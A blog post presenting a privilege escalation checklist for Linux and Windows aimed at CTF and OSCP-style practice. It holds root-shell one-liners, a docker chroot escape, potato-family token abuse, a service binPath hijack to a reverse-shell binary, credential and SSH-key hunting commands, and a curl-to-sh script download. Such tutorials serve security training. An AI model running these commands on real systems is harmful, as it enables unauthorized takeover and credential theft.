The Privilege Escalation Playbook — Linux & Windows

Privilege Escalation

Published by Doomsknight · KnightSec Reading time: ~15 minutes

Introduction

If you've ever sat staring at a low-priv shell wondering "now what?" — this post is for you.

Privilege escalation is the art of turning a foothold into ownership. It's where most CTF players (and honestly, most pentesters) get stuck. The trick isn't memorizing every CVE — it's having a methodical checklist you can run top-down, knowing the cheap, common wins come first and the noisy kernel exploits come dead last.

What follows is the exact mental model I use on every box. Work through it in order. Don't skip steps because you "feel" the answer is somewhere else — discipline beats intuition here.

🐧 Part 1 — Linux Privilege Escalation

0. First Thing: Get a Stable Shell

Before anything else, upgrade your shell. A broken reverse shell where Ctrl+C kills your session and tab-completion doesn't work will cost you hours. Fix it now.

BASH

python3 -c 'import pty; pty.spawn("/bin/bash")'
# then Ctrl+Z
stty raw -echo; fg
export TERM=xterm

1. System & Kernel Enumeration

BASH

uname -a                  # kernel version
cat /etc/os-release       # distro
arch                      # 32 vs 64 bit
hostname

Note the kernel version and check exploit-db or run searchsploit linux kernel <version>. But — and this is important — don't lead with kernel exploits. They're noisy, can crash the box, and reset your progress. Save them for last.

2. User Context (always start here)

BASH

id
whoami
groups
sudo -l                   # ★ huge — check NOPASSWD entries
cat /etc/passwd | grep -v nologin
cat /etc/group

If sudo -l shows any binary, your next stop is GTFOBins (https://gtfobins.github.io). That site alone solves a startling percentage of easy/medium boxes.

Watch out for these groups: docker, lxd, disk, adm, video, sudo, wheel — each has a known abuse path.

3. SUID / SGID Binaries

BASH

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null

Cross-reference each non-default binary with GTFOBins. Standard ones (passwd, su, mount, ping) are usually safe. The interesting ones — find, nmap, vim, python, or anything custom — are gold.

4. Linux Capabilities

BASH

getcap -r / 2>/dev/null

cap_setuid+ep on python, perl, or ruby is an instant root. Example:

BASH

python -c 'import os; os.setuid(0); os.system("/bin/sh")'

5. Cron Jobs

BASH

cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/* 2>/dev/null

Look for writable scripts run by root. Two specific patterns to hunt for: PATH manipulation in crontab and wildcard issues (e.g. tar * in a writable dir — a classic).

6. Writable Files & PATH Hijacking

BASH

find / -writable -type d 2>/dev/null            # writable dirs
find / -perm -o+w -type f 2>/dev/null           # world-writable files
echo $PATH

If a script run by root calls a binary by name (no full path), and any earlier $PATH entry is writable, drop a malicious binary there. Done.

7. Credentials & Secrets Hunting

BASH

cat ~/.bash_history
cat /home/*/.bash_history 2>/dev/null
grep -r -i "password" /etc/ 2>/dev/null
grep -r -i "passwd" /var/www/ 2>/dev/null
find / -name "*.conf" -readable 2>/dev/null
find / -name "id_rsa*" 2>/dev/null
find / -name "*.kdbx" 2>/dev/null               # KeePass DBs
cat /etc/fstab                                  # mount creds sometimes here

Always check web roots: /var/www/html, /opt/, /srv/ for DB creds and config files. Files like mysql_history, psql_history, and .viminfo often leak commands with passwords still in them.

8. SSH Keys

BASH

ls -la ~/.ssh /home/*/.ssh /root/.ssh 2>/dev/null
find / -name "authorized_keys" 2>/dev/null
find / -name "id_rsa" 2>/dev/null

A world-readable private key is direct lateral or vertical movement.

9. NFS Mounts

BASH

cat /etc/exports
showmount -e <target>          # from attacker box

no_root_squash → mount the share as root locally and drop a SUID binary. Easy win when it shows up.

10. Docker / LXD Group

docker group: docker run -v /:/mnt --rm -it alpine chroot /mnt sh → root.
lxd group: Import an Alpine image and mount / as a shared device.

11. Sudo Misconfigurations / Version

BASH

sudo --version

Old sudo (< 1.8.28) → CVE-2019-14287 (sudo -u#-1).
sudo 1.8.2–1.9.5p1 → CVE-2021-3156 (Baron Samedit, heap overflow).
Env preservation: LD_PRELOAD, LD_LIBRARY_PATH if env_keep is set.

12. Services & Processes

BASH

ps auxf
ps -ef | grep root
netstat -tulnp 2>/dev/null
ss -tulnp

Internal services bound to 127.0.0.1 are often the path. Port-forward them and have a look.

13. Automated Enumeration (run ONE then verify manually)

LinPEAS: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
linux-exploit-suggester: ./les.sh
pspy (passive process snooping — finds cron without read access): ./pspy64

🪟 Part 2 — Windows Privilege Escalation

Windows priv-esc has a different rhythm. Where Linux rewards reading config files, Windows rewards reading token privileges and service ACLs. Start there.

1. Baseline Enumeration

CMD

whoami /all
whoami /priv
whoami /groups
systeminfo
hostname
net user
net localgroup administrators

2. Token Privileges (★ check first, biggest wins)

Look at whoami /priv for any of these:

Privilege	Exploit
`SeImpersonatePrivilege`	JuicyPotato / PrintSpoofer / GodPotato / RoguePotato
`SeAssignPrimaryToken`	Same potato family
`SeBackupPrivilege`	Read SAM/SYSTEM hives → dump hashes
`SeRestorePrivilege`	Overwrite system files
`SeTakeOwnership`	Take ownership of sensitive files
`SeDebugPrivilege`	Inject into SYSTEM processes
`SeLoadDriver`	Load malicious driver

If you're a service account (IIS APPPOOL\*, NT SERVICE\*, mssql-svc) → almost always SeImpersonate → PrintSpoofer is the modern go-to.

CMD

PrintSpoofer.exe -i -c cmd
GodPotato.exe -cmd "cmd /c whoami"

3. Unquoted Service Paths

CMD

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

If the path is C:\Program Files\Some Folder\service.exe (unquoted, with spaces) and any parent dir is writable → drop Program.exe.

4. Service Permissions

CMD

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe /accepteula -uwcqv "Users" *

SERVICE_ALL_ACCESS or SERVICE_CHANGE_CONFIG on a service → modify binPath to your payload, restart.

CMD

sc config <service> binPath= "C:\path\to\rev.exe"
sc start <service>

5. AlwaysInstallElevated

CMD

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Both = 0x1 → craft an MSI with msfvenom, run msiexec /quiet /qn /i evil.msi → SYSTEM.

6. Stored Credentials

CMD

cmdkey /list
runas /savecred /user:ADMIN cmd
dir /a:h /s C:\Users\*.kdbx 2>nul
findstr /si "password" *.xml *.ini *.txt *.config 2>nul

Two unsexy but reliable hunting spots:

Unattend.xml, sysprep.xml, Autounattend.xml in C:\Windows\Panther\ often contain base64'd admin passwords.
C:\Windows\System32\config\RegBack\ — backup hives sometimes left readable.

7. Registry Autoruns & Writable Keys

CMD

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run

If a Run entry points to a writable binary → replace it.

8. Scheduled Tasks

CMD

schtasks /query /fo LIST /v

Look for tasks running as a higher-priv user with writable script paths.

9. DLL Hijacking

Use Process Monitor (or look at imports) → find a process searching for a missing DLL in a writable location → drop your DLL there.

10. Saved Browser / App Creds

Firefox: key4.db + logins.json → decrypt with firefox_decrypt.py.
WinSCP, FileZilla, PuTTY (HKCU\Software\SimonTatham\PuTTY\Sessions) all leak creds.

11. Automated Enumeration

WinPEAS: winPEASx64.exe
PowerUp: Import-Module PowerUp.ps1; Invoke-AllChecks
Seatbelt: Seatbelt.exe -group=all
Watson: patch-level missing exploits (Win 7/Server 2008 era).

12. Kernel / Patch Exploits (last resort)

CMD

systeminfo > sysinfo.txt

Feed to Windows Exploit Suggester (WES-NG) offline. Common hits: Juicy Potato (≤ Server 2016), MS16-032, MS17-010 (yes, sometimes still on HTB easy boxes), PrintNightmare (CVE-2021-34527).

📚 Reference Cheatsheets — Bookmark These

Resource	URL
GTFOBins (Linux)	https://gtfobins.github.io
LOLBAS (Windows)	https://lolbas-project.github.io
HackTricks	https://book.hacktricks.xyz
PayloadsAllTheThings	https://github.com/swisskyrepo/PayloadsAllTheThings
PEASS-ng	https://github.com/peass-ng/PEASS-ng

🎯 General Methodology — The Six Rules

Get a stable shell first. Don't enumerate from a broken reverse shell.
Manual enumeration before automated. sudo -l, id, whoami /priv — these alone solve 60% of easy/medium boxes.
One automated tool, then verify. Run LinPEAS/WinPEAS, but read the output — don't blindly trust the red highlights.
Pivot through internal services. A service bound to 127.0.0.1 that you can hit is often the answer.
Document credentials as you find them. A user password often gets reused for sudo, su, SSH, or admin services.
If stuck for >30 min: re-enumerate as the new user. Every shell context is a new enumeration cycle.

Closing Thoughts

Privilege escalation is less about being clever and more about being thorough. The boxes that crush you aren't the ones with obscure exploits — they're the ones where you skipped step 2 because you assumed it'd be empty.

Run the checklist. Trust the process. The root flag will follow.

If this helped, share it with someone who's grinding through their first OSCP-style box. And if you spot a technique I've missed — drop me a note. This list grows every time I learn something new.

— Doomsknight

Have feedback or want to discuss a technique? Reach out via WhatsApp — +1 (347) 260-3596.